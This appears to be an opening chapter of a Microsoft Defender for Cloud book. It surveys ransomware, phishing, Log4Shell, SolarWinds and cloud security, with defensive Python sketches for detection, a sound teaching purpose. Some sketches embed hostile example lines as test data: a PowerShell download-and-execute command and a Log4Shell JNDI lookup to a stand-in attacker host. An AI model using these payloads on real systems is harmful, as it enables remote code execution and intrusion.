Chapter 1

The Threat Landscape

According to the Cybersecurity and Infrastructure Security Agency (CISA) Alert Report (AA22-040A), issued in February 2022, ransomware tactics and techniques continued to evolve in 2021. Even so, cybercriminals were still using old attack methods with a high rate of success. These included gaining access to network infrastructure through phishing emails, using credentials stolen through Remote Desktop Protocol (RDP) brute-force attacks, and exploiting known unpatched vulnerabilities.

The same report emphasizes the level of professionalism that ransomware operations reached in 2021 through Ransomware as a Service (RaaS). Cybercriminals now hire online services that help them run their attack campaigns and negotiate payments. As these cyberattacks grow more sophisticated, organizations must keep elevating their security posture. That means taking proactive actions to reduce exposure and employing intelligent analytics that can quickly identify attempts to compromise their systems. This chapter explores some of these threats to prepare you to use Microsoft Defender for Cloud to protect against them. It also discusses cybercrime, the MITRE ATT&CK framework, establishing your security posture, and the assume-breach approach.

The state of cybercrime

Amateur threat actors with limited technical skills are investing in RaaS kits for their campaigns because the kits provided by professional cybercriminals are sophisticated and easy to use. According to the Microsoft Digital Defense Report 2021, payment for these kits can be a percentage of the profit, such as 30 percent of the ransom. This model encourages amateur threat actors to take the risk because it requires no upfront investment.

In 2021, ransomware gained a lot of visibility, mainly after the Colonial Pipeline incident. The Colonial Pipeline is one of the largest oil pipelines in the United States. While the news emphasized the ransomware attack, it is important to understand that the threat actor first had to establish a foothold in the network, which was done by gaining access through a legacy VPN account. Also in 2021, threat actors targeted VPN infrastructure, for example by exploiting known vulnerabilities in Pulse Secure VPN appliances.

However, RaaS is not the only offering; professional cybercriminals sell other online services as well. For example, they might offer counter-antivirus (CAV) services, which test new malware against antivirus engines to ensure it can be deployed without being detected. Another offering is bulletproof hosting for online criminal activity. (It’s called “bulletproof” because the owners of these servers do not cooperate with local law enforcement.) There are even escrow services that act as a third party in online transactions between technical criminals and their criminal clients.

Note

To download the Microsoft Digital Defense Report 2021, see www.microsoft.com/digitaldefensereport.

In 2021, Acer was also hit by REvil ransomware (a Russia-based RaaS operation), and the threat actors demanded what was then the largest known ransom: $50 million. You can see a list of all known techniques used by REvil at https://attack.mitre.org/software/S0496. JBS Foods was also attacked by REvil and, as a result, had to temporarily halt operations in Canada, Australia, and the United States. JBS ended up paying $11 million in ransom (see https://www.cbsnews.com/news/jbs-ransom-11-million), one of the biggest ransomware payments of all time.

Cybercriminals might also use advanced code injection methods, such as file-less attacks, which usually leverage tools already present on the target system, such as PowerShell. Because the tool is already on the computer, the attacker doesn’t need to write anything to the hard drive. Instead, they take over a target process, run a piece of code in its memory space, and then use that code to call the tool that performs the attack. The question here is this: Do you have detections for that? Microsoft Defender for Cloud does!
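File-less attacks often hide their script in a Base64-encoded PowerShell command line, so nothing suspicious lands on disk. The sketch below shows the kind of check a detection engine might run against process command lines. It is not how Defender for Cloud implements its analytics. The function names and the download-and-execute heuristic are hypothetical. The one fact it relies on is that PowerShell’s -EncodedCommand switch takes Base64-encoded UTF-16LE text.

```python
import base64
import re
from typing import Optional

# Commonly seen spellings of PowerShell's -EncodedCommand switch (full name,
# the -enc prefix, and the -ec / -e short forms), longest first.
ENCODED_SWITCH = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the hidden script text, or None if there is no decodable payload."""
    match = ENCODED_SWITCH.search(command_line)
    if match is None:
        return None
    try:
        # -EncodedCommand takes Base64 of a UTF-16LE string.
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except ValueError:  # covers bad Base64 padding and invalid UTF-16 data
        return None

def looks_fileless(command_line: str) -> bool:
    """Hypothetical heuristic: an encoded script that downloads code and runs it in memory."""
    script = decode_encoded_command(command_line)
    if script is None:
        return False
    lowered = script.lower()
    return "downloadstring" in lowered and ("iex" in lowered or "invoke-expression" in lowered)

payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
cmd = "powershell.exe -NoProfile -enc " + base64.b64encode(payload.encode("utf-16-le")).decode()
print(looks_fileless(cmd))  # True
```

Decoding first and then inspecting the script is the important step. The raw command line shows only opaque Base64, which is exactly why attackers use it.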

Email phishing continues to grow as an attack vector, and cybercriminals adapt their lures to the main theme of the moment (the topic used to attract attention). In 2020, the main theme was COVID-19. The lure changed, but the core structure of the attack didn’t really change from past attacks. Figure 1-1 shows an example of a credential phishing attack (a spearphishing attack).

FIGURE 1-1 Typical credential phishing flow

Figure 1-1 shows a summary of the five main phases of a spearphishing attack targeting the user’s credentials. The five phases shown in this figure are explained in more detail below:

The threat actor prepares a cybercriminal infrastructure by configuring fake or compromised domains. During this process, the threat actor will also gather information about the potential target.

Next, the malicious email is sent to the target.

The email is well-crafted and leverages social engineering techniques that will entice the user to click a hyperlink embedded in the email.

At this point, there are usually two scenarios for credential theft:

The victim is redirected to a fake or compromised domain, where they are prompted to type their credentials.

Upon clicking the hyperlink, malware is downloaded to the victim’s device, which will harvest the user’s credentials.

Now that the threat actor has the user’s credentials, they use them on other legitimate sites or to gain access to the company’s network.
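The credential phishing flow depends on a fake domain that looks close enough to a real one to fool the user. Such domains are set up during preparation and used when the victim clicks the link. A minimal sketch of a lookalike-domain check follows. It assumes a hypothetical allowlist (TRUSTED_DOMAINS) and uses difflib’s similarity ratio as a simple stand-in for the more robust techniques production mail filters use.

```python
from difflib import SequenceMatcher
from urllib.parse import urlparse

# Hypothetical allowlist of domains the organization really uses.
TRUSTED_DOMAINS = {"contoso.com", "microsoftonline.com"}

def base_domain(url: str) -> str:
    """Naively keep the last two labels of the host (login.contoso.com -> contoso.com)."""
    host = (urlparse(url).hostname or "").lower()
    return ".".join(host.split(".")[-2:])

def classify_link(url: str, threshold: float = 0.8) -> str:
    """Label a link as 'trusted', 'lookalike', or 'unknown'."""
    domain = base_domain(url)
    if domain in TRUSTED_DOMAINS:
        return "trusted"
    for trusted in TRUSTED_DOMAINS:
        # A near-identical spelling (contos0.com) is typical of a fake domain.
        if SequenceMatcher(None, domain, trusted).ratio() >= threshold:
            return "lookalike"
    return "unknown"

for link in ("https://login.contoso.com/", "https://contos0.com/signin", "https://example.org/"):
    print(link, classify_link(link))
```

The last-two-labels shortcut breaks for suffixes such as .co.uk. A real implementation would consult the Public Suffix List and combine this signal with sender reputation and URL detonation.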

Although the example above refers to a spearphishing attack, which is an old technique, cybercriminals may also use advanced methods of code injection, such as file-less techniques.

In December 2021, the world was surprised by CVE-2021-44228, a vulnerability that became known as Log4Shell. It affected Log4j, an open-source Java logging framework that is widely used by cloud and enterprise application developers, and threat actors quickly began to exploit it. An attacker could send a specially crafted string containing a Java Naming and Directory Interface (JNDI) lookup to a server running a vulnerable version of Log4j. When the server logged that string, Log4j resolved the lookup over a protocol such as LDAP, RMI, NDS, or DNS, which could lead to remote code execution. Organizations that were using Microsoft Defender for Cloud could quickly identify which machines were vulnerable to this CVE by using the Inventory feature.

Note

You can read more about this scenario at http://aka.ms/MDFCLog4J.
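The Log4Shell attack hinges on Log4j evaluating a lookup embedded in attacker-controlled text, such as an HTTP User-Agent header that the application logs. The following is a minimal sketch of a log-inspection check, assuming you can read the raw strings before or after they are logged. The function name is hypothetical, and this is not how Defender for Cloud detects exploitation.

```python
import re
from typing import List

# Matches an unobfuscated ${jndi:<protocol>://...} lookup for the protocols
# discussed above. Real attacks often nested lookups (for example
# ${${lower:j}ndi:...}) to evade simple patterns, so this is a first-pass filter.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldaps?|rmi|nds|dns)://", re.IGNORECASE)

def find_jndi_lookups(logged_text: str) -> List[str]:
    """Return the JNDI protocols referenced by lookups in a logged string."""
    return [match.group(1).lower() for match in JNDI_LOOKUP.finditer(logged_text)]

request_header = "User-Agent: ${jndi:ldap://attacker.example/a}"
print(find_jndi_lookups(request_header))  # ['ldap']
```

Pattern matching like this only finds attempts. Knowing which machines actually run a vulnerable Log4j version still requires an inventory, which is the point of the Defender for Cloud scenario above.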

Understanding the cyberkill chain

One of the most challenging aspects of defending your systems against cybercriminals is recognizing when those systems are being used for criminal activity in the first place, especially when they are part of a botnet. A botnet is a network of compromised devices that an attacker controls without their owners’ knowledge. Botnets are not new. In fact, a 2012 Microsoft study found that cybercriminals infiltrated insecure supply chains using the Nitol botnet, which introduced counterfeit software embedded with malware to secretly infect computers even before they were purchased.

Note

For more information, see https://aka.ms/nitol.

In 2020, we saw one of the most famous supply chain attacks utilizing malicious SolarWinds files and potentially giving nation-state actors access to some victims’ networks. This supply chain attack took place when attackers inserted malicious code into a DLL component of the legitimate software (SolarWinds.Orion.Core.BusinessLayer.dll). The compromised DLL was distributed to organizations that were using this software.

The execution phase only required the user or system to start the software and load the compromised DLL. Once this happened, the inserted malicious code established persistence, giving the attacker long-term access through its backdoor capability. The entire process was very well thought out. The backdoor avoided detection by running an extensive list of checks to ensure that it was running on a real target network rather than in an analysis environment. It then performed initial reconnaissance to gather the necessary information and connected to a command-and-control (C2) server. As part of the exfiltration, the backdoor sent the gathered information to the attacker. The attacker also gained a wide range of other backdoor capabilities to perform additional activities, such as credential theft, privilege escalation, and lateral movement.

The best way to prevent this type of attack, or any other, is to improve your overall security posture by hardening your resources and improving your detection capabilities. To build effective detections, you need to understand the attack vectors, that is, how an attacker will attack your environment. To help you understand this, we will use a version of the cyberkill chain, a model originally developed by Lockheed Martin. Each step in this chain represents a particular attack phase (see Figure 1-2).

FIGURE 1-2 Example of the cyberkill chain steps

Below are the main steps in this chain, as shown in Figure 1-2:

External recon During this step, attackers typically search publicly available data to identify as much information as possible about their target. The aim is to obtain intelligence, or intel, to better perform the attack and increase the likelihood of success.

Compromised machine During this step, attackers leverage different techniques, such as social engineering, to entice users to do something. For example, the attacker might send a phishing email to lure the user into clicking a link that will compromise the machine. The goal is to establish a foothold in the victim’s network.

Internal recon and lateral movement During this step, the attacker performs host discovery and identifies and maps internal networks and systems. The attacker might also start moving laterally between hosts, looking for a privileged user’s account to compromise.

The low-privileges lateral movement cycle During this cycle, the attacker continues to search for accounts with administrative privileges so that they can perform a local privilege escalation attack. Typically, this cycle continues until the attacker finds a domain administrative user account that can be compromised.

Domain admin creds At this point, the attacker has compromised a domain administrator account and can achieve complete domain dominance. From here, the attacker can pivot through the network, either looking for valuable data or installing ransomware or other malware that can be used for future extortion attempts.

It is important to understand these steps because, throughout this book, you will learn how Defender for Cloud can be used to disrupt the cyberkill chain by detecting attacks in different phases.

Using the MITRE ATT&CK Framework to protect and detect

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge, https://attack.mitre.org/) is a knowledge base of adversary tactics and techniques based on real-world observations. For three years in a row (2019-2021), Microsoft demonstrated industry-leading defense capabilities in the independent MITRE Engenuity ATT&CK Evaluation.

In 2021, Microsoft also released the MITRE ATT&CK mappings for built-in Azure security controls. Also in 2021, Microsoft Defender for Cloud started mapping all security recommendations to MITRE ATT&CK. This helps defenders understand which preventative actions they can take to reduce the likelihood that a threat actor will exploit a vulnerability, based on the different MITRE ATT&CK tactics and techniques. The security alerts triggered by the different Microsoft Defender for Cloud plans are also mapped to MITRE ATT&CK tactics and techniques. This gives the Security Operations Center (SOC) analyst a better understanding of the stage of the attack and how it potentially happened. In Chapter 5, “Strengthening your security posture,” you will learn more about using MITRE ATT&CK tactics and techniques to prioritize the remediation of security recommendations.

Tip

To learn more about MITRE ATT&CK, you can download this free ebook at https://www.mitre.org/sites/default/files/publications/mitre-getting-started-withattack-october-2019.pdf.

Common threats

Ransomware is a threat that grew sharply at the peak of the COVID-19 pandemic. According to the Microsoft Digital Defense Report of September 2020, 70 percent of human-operated ransomware attacks were brute-force Remote Desktop Protocol (RDP) attacks. This is an alarming number for a problem that can be easily mitigated with technologies such as just-in-time (JIT) VM access. JIT VM access is available in Microsoft Defender for Servers, which is part of Defender for Cloud.
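Just-in-time access removes the standing exposure that RDP brute-force attacks depend on. The management port stays closed by default and opens only for an approved source IP for a limited time. The sketch below models that idea in plain Python. The class and method names and the three-hour limit are hypothetical, and this is not the Defender for Servers API. The real feature enforces access through network security group rules.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import List, Set

@dataclass
class AccessGrant:
    source_ip: str
    port: int
    expires_at: datetime

@dataclass
class JitPolicy:
    """Hypothetical JIT model: ports stay closed unless a time-limited grant exists."""
    allowed_ports: Set[int]
    max_duration: timedelta
    grants: List[AccessGrant] = field(default_factory=list)

    def request(self, source_ip: str, port: int, duration: timedelta, now: datetime) -> AccessGrant:
        if port not in self.allowed_ports:
            raise ValueError(f"port {port} is not configured for JIT access")
        if duration > self.max_duration:
            raise ValueError("requested duration exceeds the policy maximum")
        grant = AccessGrant(source_ip, port, now + duration)
        self.grants.append(grant)
        return grant

    def is_allowed(self, source_ip: str, port: int, now: datetime) -> bool:
        # Default deny: only an unexpired grant for this exact IP and port opens the port.
        return any(
            g.source_ip == source_ip and g.port == port and now < g.expires_at
            for g in self.grants
        )

# Hypothetical policy: RDP only, at most three hours per request.
policy = JitPolicy(allowed_ports={3389}, max_duration=timedelta(hours=3))
start = datetime(2022, 1, 10, 9, 0)
policy.request("203.0.113.10", 3389, timedelta(hours=1), now=start)
print(policy.is_allowed("203.0.113.10", 3389, start + timedelta(minutes=30)))  # True
print(policy.is_allowed("198.51.100.7", 3389, start + timedelta(minutes=30)))  # False
```

A brute-force tool scanning from an unapproved address never sees an open port. Even the approved administrator loses access once the grant expires.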

Threat actors are also applying existing attack methods to new workloads, such as Kubernetes. The Defender for Cloud research team mapped the Kubernetes security landscape. They noticed that although the attack techniques differ from those targeting single hosts running Linux or Windows, the tactics are similar. When a Kubernetes cluster is deployed in a public cloud, threat actors who compromise cloud credentials can take over the cluster. The impact differs from that of an attack on a single host because the whole cluster is compromised, but the tactic is similar to the one used to compromise a single host.

According to the Verizon Data Breach Investigations Report of 2021, phishing is still the predominant method of delivering malware. This makes sense: the end user is almost always the target because they are the weakest link. With the proliferation of mobile devices, bring-your-own-device (BYOD) models, and cloud-based apps, users are installing more and more apps. All too often, these apps are malware masquerading as legitimate apps. It is important to have solid endpoint protection and a detection system that correlates different sources to intelligently identify unknown threats, using technologies such as analytics and machine learning.

Because of a lack of security hygiene, threat actors are more likely today to succeed with the attacks mentioned above. According to the Verizon Data Breach Investigations Report from 2020, misconfiguration accounted for 40 percent of the root causes of compromised systems. Something as simple as a user provisioning a storage account and leaving it open to Internet connections is enough to increase the attack surface. That’s why it is so important to have a tool such as Microsoft Defender for Cloud that brings visibility and control over different cloud workloads.
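The storage-account example is the kind of misconfiguration a posture-management tool checks automatically. The sketch below audits a storage account described in Azure Resource Manager (ARM) JSON. The property names (allowBlobPublicAccess, networkAcls.defaultAction, supportsHttpsTrafficOnly) follow the ARM schema for storage accounts. The audit logic, the function name, and the rule that unset values count as permissive are assumptions for illustration. This is far simpler than Defender for Cloud’s recommendations.

```python
from typing import Any, Dict, List

def audit_storage_account(account: Dict[str, Any]) -> List[str]:
    """Return misconfiguration findings for a storage account in ARM JSON form.

    Unset values are treated as permissive, an assumption made for this sketch.
    """
    props = account.get("properties", {})
    findings: List[str] = []
    if props.get("allowBlobPublicAccess", True):
        findings.append("anonymous (public) blob access is allowed")
    if props.get("networkAcls", {}).get("defaultAction", "Allow") == "Allow":
        findings.append("the account accepts connections from all networks, including the Internet")
    if not props.get("supportsHttpsTrafficOnly", False):
        findings.append("unencrypted HTTP requests are accepted")
    return findings

exposed = {
    "name": "demo",
    "properties": {
        "allowBlobPublicAccess": True,
        "networkAcls": {"defaultAction": "Allow"},
        "supportsHttpsTrafficOnly": True,
    },
}
for finding in audit_storage_account(exposed):
    print(finding)
```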

Improving security posture

It used to be the case that cybersecurity experts recommended that organizations simply invest more in protecting their assets. Nowadays, however, simply investing in protecting your assets is not enough. The lack of security hygiene across the industry was mentioned in the Cybersecurity and Infrastructure Security Agency (CISA) Analysis Report (AR21-013A), released in January 2021. The report, “Strengthening Security Configurations to Defend Against Attackers Targeting Cloud Services,” stated that most threat actors successfully exploited resources because of “poor cyber hygiene practices.”



To strengthen the security posture of your organization, you should invest equally in protection, detection, and response, as shown in Figure 1-3.

FIGURE 1-3 The three pillars of your security posture

It is important to expand on the rationale behind the triad (protection, detection, and response) shown in Figure 1-3. When it comes to protection, you need to think of the proactive actions that must be taken to decrease the likelihood that resources will be compromised. This must be done as part of your security hygiene.

Once all proactive actions are done, vulnerabilities are remediated, and the system is hardened, you must actively monitor the system and identify threat actors who are trying to break in. You need a strong detection mechanism across different workloads to increase the likelihood that you will detect these attacks. Each workload needs its own set of analytics that are relevant to its use case. For example, you can’t expect good detection for your storage accounts if you only have analytics for your Key Vault, because these two workloads have different threat landscapes. Therefore, it is imperative to have detections created specifically for each workload that you want to monitor.

Once you detect an attack, you need to respond. That means having a good incident response process in place to reduce the time between detection and response. This determines how fast you can mitigate the attack and stop the threat from spreading. Also, it’s important to use the lessons learned from each incident response to feed your security hygiene. In other words, learn from each incident and improve your protection. This is a constant loop, and you must continuously improve.

A solid security posture also prevents threat actors from staying in your network for a long time. According to the InfoSec Institute, attackers lurk on networks for an average of 200 days without being detected. (See http://resources.infosecinstitute.com/the-seven-steps-of-a-successful-cyber-attack for more information.) This is a tremendous amount of time to have an attacker inside your network, but the key word here is detected. Without a good detection mechanism, you have no way of disrupting an attack, so it is imperative that you invest in a holistic solution to monitor cloud-based resources and on-premises assets. You must be able to quickly detect an attack and use actionable data to improve your response.

That said, collecting data without analyzing it only delays the response process. That’s why it is so important to use tools that leverage technologies such as behavior analytics, threat intelligence, and machine learning for data correlation. Defender for Cloud does all that for you, reducing false positives and showing what’s relevant to your investigation.

Adopting an assume-breach mentality

Microsoft recognizes that preventing a breach is not enough. Microsoft hasn’t “given up” or “thrown up the white flag”; it continues to use all the traditional prevent-breach processes and technologies. In addition to those, Microsoft has embraced an assume-breach philosophy. It’s okay to hope you’ll never be breached, as long as you know that hope is a poor strategy. Therefore, Microsoft assumes its public cloud network is about to be breached, or has already been breached. It identifies the people, processes, and technologies that will help it learn as early as possible that a breach occurred, identify the type of breach, and then eject the attacker. The goal is to limit the expansion of the breach as much as possible.

Microsoft uses the assume-breach approach to understand how attackers gain access to the system, and then it develops methods to catch the attacker as soon after the breach as possible. Attackers typically enter a system through a low-value target (for example, a compromised user credential). Detecting that compromise quickly can stop the attacker from moving from the low-value asset to higher-value assets (such as an administrative credential). These high-value assets are the attacker’s ultimate target.

Microsoft uses a very effective method called red-teaming, or red/blue team simulations. In these exercises, the red team takes on the role of the attacker, and the blue team takes on the defender role. After the exercise parameters and agreed-upon duration of the exercise are determined, the red team tries to attack the Azure infrastructure. Then the blue team tries to discover what the red team has done and then attempts to block the red team from compromising additional systems (if indeed the red team was able to compromise any systems).

At the end of the exercise, the red and blue teams discuss what happened, how the red team might have got in, and how the blue team discovered and ejected the red team, and then suggestions are made for new technologies and operational procedures that will make it easier and faster to discover a compromise.

Cloud threats and security

Visibility and control of different workloads is an area that is becoming critical when it comes to security hygiene. Typical targets of threat actors are exposed storage containers; these actors use custom scanners they’ve built to identify public containers.

Threat actors actively scan public storage to find “sensitive” content, and they usually leverage the Azure Storage API to list content available within a public storage container. Usually, this process takes place in the following phases:

Finding storage accounts During this phase, threat actors will try to find Azure Storage accounts using the blob storage URL pattern, which is <storage-account>.blob.core.windows.net.

Finding containers After finding the storage accounts, the next step is to find any publicly accessible containers in those storage accounts by guessing the container’s name. This can be done using an API call to list blobs or any other read operation.

Finding sensitive data In this phase, threat actors can leverage online tools that search through large volumes of data looking for keywords and secrets to find sensitive information.

When you enable Defender for Storage, you have a series of analytics created for different scenarios, one of which is the anonymous scan of public storage containers.
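The first two phases rely on predictable names and a documented REST call. The sketch below builds the anonymous List Blobs request that such a scanner probes: a GET on https://<account>.blob.core.windows.net/<container>?restype=container&comp=list. Before building it, the sketch checks the Azure naming rules for storage accounts and containers. It is meant for auditing your own accounts. The function name is hypothetical, and the sketch deliberately makes no network call.

```python
import re

# Azure naming rules: account names are 3-24 lowercase letters or digits;
# container names are 3-63 characters of lowercase letters, digits, and
# single hyphens that never start or end the name.
ACCOUNT_NAME = re.compile(r"[a-z0-9]{3,24}")
CONTAINER_NAME = re.compile(r"[a-z0-9]+(?:-[a-z0-9]+)*")

def list_blobs_url(account: str, container: str) -> str:
    """Build the anonymous List Blobs URL that a public-container scanner probes."""
    if not ACCOUNT_NAME.fullmatch(account):
        raise ValueError(f"invalid storage account name: {account!r}")
    if not (3 <= len(container) <= 63 and CONTAINER_NAME.fullmatch(container)):
        raise ValueError(f"invalid container name: {container!r}")
    # restype=container&comp=list is the List Blobs operation; it succeeds
    # anonymously only when the container allows public (container-level) access.
    return f"https://{account}.blob.core.windows.net/{container}?restype=container&comp=list"

print(list_blobs_url("contosodata", "backups"))
```

Requesting that URL without credentials against your own accounts, for example with urllib.request.urlopen, is a quick way to confirm that no container is publicly listable.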

The Microsoft Security Intelligence Report Volume 22 shows the global reach of cloud weaponization, which is the act of using cloud computing capabilities for malicious purposes. According to this report, more than two-thirds of incoming attacks on Azure services in the first quarter of 2017 came from IP addresses in China (35.1 percent), the United States (32.5 percent), and Korea (3.1 percent). The remaining attacks were distributed across 116 other countries and regions. Sometimes, threat actors weaponize the cloud to send an attack to a target system (see Figure 1-4). Other times, threat actors simply hijack the resources of the target system. For example, suppose a cloud admin misconfigured a Kubernetes cluster or Docker registry in a way that allowed free public access to it. Attackers could then deploy containers that mine cryptocurrency. The diagram in Figure 1-4 shows an attacker gaining access to VMs in the cloud and using their compute resources to attack on-premises assets. Some users connect remotely to those VMs, and ultimately they are also affected. This is a typical cloud weaponization scenario.

FIGURE 1-4 Cloud weaponization targeting on-premises resources

Another potential threat in the cloud comes from configuration flaws, again because of a lack of security hygiene. One common scenario is a secret key being shared publicly. You might think this doesn’t happen, but it does! In a study conducted by North Carolina State University (NCSU) in 2019, researchers spent six months scanning billions of files from 13 percent of all public GitHub repositories. The results showed that 100,000 GitHub repositories had leaked API or cryptographic keys.

Figure 1-5 illustrates a scenario in which bots were scanning GitHub to steal keys.

FIGURE 1-5 Public secret attack scenario
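Bots that harvest keys from public repositories mostly rely on pattern matching, and defenders can run the same kind of check before code is pushed. The sketch below uses a few well-known formats: AWS access key IDs start with AKIA, Azure Storage connection strings contain AccountKey=, and PEM private keys have a BEGIN header. The rule set, the loose Azure pattern, and the function name are assumptions for illustration. Production secret scanners use far more rules plus entropy checks.

```python
import re
from typing import List, Tuple

# A few illustrative rules; the Azure rule is deliberately loose (an assumption).
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "azure_storage_account_key": re.compile(r"AccountKey=[A-Za-z0-9+/=]{40,}"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}

def scan_text(text: str) -> List[Tuple[int, str]]:
    """Return (line number, rule name) for every rule that matches a line."""
    hits: List[Tuple[int, str]] = []
    for line_number, line in enumerate(text.splitlines(), start=1):
        for rule_name, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                hits.append((line_number, rule_name))
    return hits

# AKIAIOSFODNN7EXAMPLE is the placeholder key ID used in AWS documentation.
sample = 'timeout = 30\naws_key = "AKIAIOSFODNN7EXAMPLE"\n'
print(scan_text(sample))  # [(2, 'aws_access_key_id')]
```

Wiring a check like this into a pre-commit hook or CI pipeline catches the leak before the repository becomes public, which is the only point at which it is cheap to fix.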

Attackers are also shifting their efforts to evade the detections provided by cloud workload protection platforms (CWPP). In January 2019, a report from Palo Alto Networks showed how malware used by the Rocke group was able to uninstall the CWPP agent before showing signs of malicious behavior. Cloud providers must act quickly to remediate scenarios like this. When selecting your CWPP agent, you need to know how quickly its vendor can respond to new threat vectors like this one.

For this reason, before adopting cloud computing, organizations must first understand the security considerations inherent in the cloud computing model. These considerations must be reviewed before adoption, ideally during the planning process. Without a full understanding of cloud security considerations, the overall success of cloud adoption may be compromised.

Consider the following areas for cloud security:

Compliance

Risk management

Identity and access management

Operational security

Endpoint protection

Data protection

Each of these areas must be considered. Depending on the type of business you are dealing with, some areas can be explored in more depth than others. The following sections describe each of these cloud security areas in more detail.

Compliance

During migration to the cloud, organizations need to retain their own compliance obligations. These obligations could be dictated by internal or external regulations, such as compliance with industry standards to support their business models. Cloud providers must be able to assist customers to meet their compliance requirements via cloud adoption.

In many cases, cloud solution providers (CSPs) will become part of the customer’s compliance chain. Consider working closely with your cloud provider to identify your organization’s compliance needs and verify how the cloud provider can fulfill your requirements. Also, it’s important to verify whether the CSP has a proven record of delivering secure, reliable cloud services while keeping the customer’s data private and secure.

More Info

For more information on Microsoft’s approach to compliance, see https://www.microsoft.com/en-us/trustcenter/default.aspx.

Ideally, your cloud security posture management (CSPM) platform will enable you to map the security controls applied to your cloud workloads to the major regulatory compliance standards and allow you to customize your data visualization according to your needs.

Risk management

Cloud customers must be able to trust the CSP with their data. CSPs should have policies and programs in place to manage online security risks. These policies and programs can vary depending on how dynamic the environment is. Customers should work closely with CSPs and demand full transparency to understand risk decisions, how they vary depending on data sensitivity, and the level of protection required.

Note

To manage risks, Microsoft uses mature processes based on its long-term experience delivering services on the web.

Identity and access management

Organizations planning to adopt cloud computing must be aware of the identity- and access-management methods available and of how these methods will integrate with their current on-premises infrastructure.

These days, with users working on different devices from any location and accessing apps across different cloud services, it is critical to keep the user’s identity secure. Indeed, with cloud adoption, identity becomes the new perimeter: the control plane for your entire infrastructure, regardless of location, be it on-premises or in the cloud. You use identity to control access to any services from any device and to obtain visibility and insights into how your data is being used.

As for access management, organizations should consider auditing and logging capabilities that can help administrators monitor user activity. Administrators must be able to leverage the cloud platform to evaluate suspicious login activity and take preventive actions directly from the identity-management portal.

Operational security

Organizations migrating to the cloud should evolve their internal processes, such as security monitoring, auditing, incident response, and forensics, according to the needs of their industry. For example, an organization in the financial industry has different requirements than an organization in the health insurance industry. The cloud platform must allow IT administrators to monitor services in real time, observe the health of these services, and quickly restore interrupted services. You should also ensure that deployed services are operated, maintained, and supported in accordance with the service-level agreement (SLA) established with the CSP.

Endpoint protection

Cloud security is not only about how secure the CSP infrastructure is. It is a shared responsibility. Organizations are responsible for their endpoint protection, so those that adopt cloud computing should consider increasing their endpoint security because these endpoints will be exposed to more external connections and will access apps that different cloud providers may house.

Because endpoints (workstations, smartphones, or any other device that can be employed to access cloud resources) are the devices employed by users, these users are the main target of attacks. Attackers know that the user is the weakest link in the security chain. Therefore, attackers will continue to invest in social engineering techniques, such as phishing emails, to entice users to perform actions that can compromise an endpoint.

Important

Securing privileged access is a critical step to establishing security assurances for business. Make sure to read more about privileged access workstations at http://aka.ms/cyberpaw, where you can learn more about Microsoft’s methodology for protecting high-value assets.

One important approach to enabling the end-to-end visibility of your endpoint protection and cloud workloads is the integration of your CWPP with your endpoint detection and response (EDR) solution.

Data protection

When it comes to cloud security, your goal when migrating to the cloud is to ensure that data is secure no matter where it is located. Data might exist in any of the following states and locations:

Data at rest in the user’s device In this case, the data is located at the endpoint, which can be any device. You should always enforce data encryption at rest for company-owned devices and in BYOD scenarios.

Data in transit from the user’s device to the cloud When data leaves the user’s device, you should ensure that the data is still protected. Many technologies, such as Azure Rights Management, can encrypt data regardless of its location. It is also imperative to ensure that the transport channel is encrypted. Therefore, you should enforce the use of Transport Layer Security (TLS) to transfer data.

Data at rest in the cloud provider’s datacenter Your cloud provider’s storage infrastructure should ensure redundancy and protection when your data arrives at its servers. Make sure you understand how your CSP performs data encryption at rest, who is responsible for managing the keys, and how data redundancy is performed.

Data in transit from the cloud to on-premises servers In this case, the recommendations for data in transit from the user’s device to the cloud also apply. You should enforce data encryption on the file itself and encrypt the transport layer.

Data at rest on-premises Customers are responsible for keeping their data secure on-premises. Encrypting at-rest data at the organization’s datacenter is critical to accomplishing this. Ensure you have the correct infrastructure to enable encryption, data redundancy, and key management.
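The data-in-transit items above call for an encrypted transport channel. On the client side, you can enforce that in code. The sketch below uses only the Python standard library to refuse plain HTTP and any TLS version older than 1.2. The function names are hypothetical, and TLS 1.2 as the minimum is an assumption you should align with your own policy.

```python
import ssl
import urllib.request

def strict_tls_context() -> ssl.SSLContext:
    """Client context that verifies certificates and refuses TLS older than 1.2."""
    context = ssl.create_default_context()  # certificate and hostname checks enabled
    context.minimum_version = ssl.TLSVersion.TLSv1_2
    return context

def fetch(url: str) -> bytes:
    """Download over HTTPS only, using the strict TLS context."""
    if not url.startswith("https://"):
        raise ValueError("refusing to send data over an unencrypted channel")
    with urllib.request.urlopen(url, context=strict_tls_context()) as response:
        return response.read()
```

Enforcing the floor on the client complements server-side settings. A connection fails outright rather than silently downgrading to an older, weaker protocol.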

Azure security

There are two aspects of Azure security. One is platform security—that is, how Microsoft keeps its Azure platform secure against attackers. The other is the Azure security capabilities that Microsoft offers to customers who use Azure.

The Azure infrastructure uses a defense-in-depth approach by implementing security controls in different layers. This ranges from physical security to data security, to identity and access management, and to application security, as shown in Figure 1-6.

FIGURE 1-6 Multiple layers of defense

From the Azure subscription owner’s perspective, it is important to control users’ identities and roles. The subscription owner, or account administrator, is the person who signed up for the Azure subscription. This person is authorized to access the Account Center and perform all available management tasks. With a new subscription, the account administrator is also the service administrator and inherits rights to manage the Azure portal. Customers should be very cautious about who has access to this account. Azure administrators should use Azure role-based access control (RBAC) to grant appropriate permissions to users.
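To make scope inheritance concrete, the following Python sketch models how an Azure RBAC role assignment made at a parent scope (such as a subscription) also applies to everything beneath it. It is a simplified, hypothetical model for illustration only: the `RoleAssignment` class and `effective_roles` function are not part of any Azure SDK, and real Azure RBAC also considers deny assignments, conditions, and management groups, which are omitted here.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class RoleAssignment:
    """Hypothetical model of a role assignment: who, which role, at which scope."""
    principal: str
    role: str
    scope: str  # e.g. "/subscriptions/<id>" or "/subscriptions/<id>/resourceGroups/<rg>"


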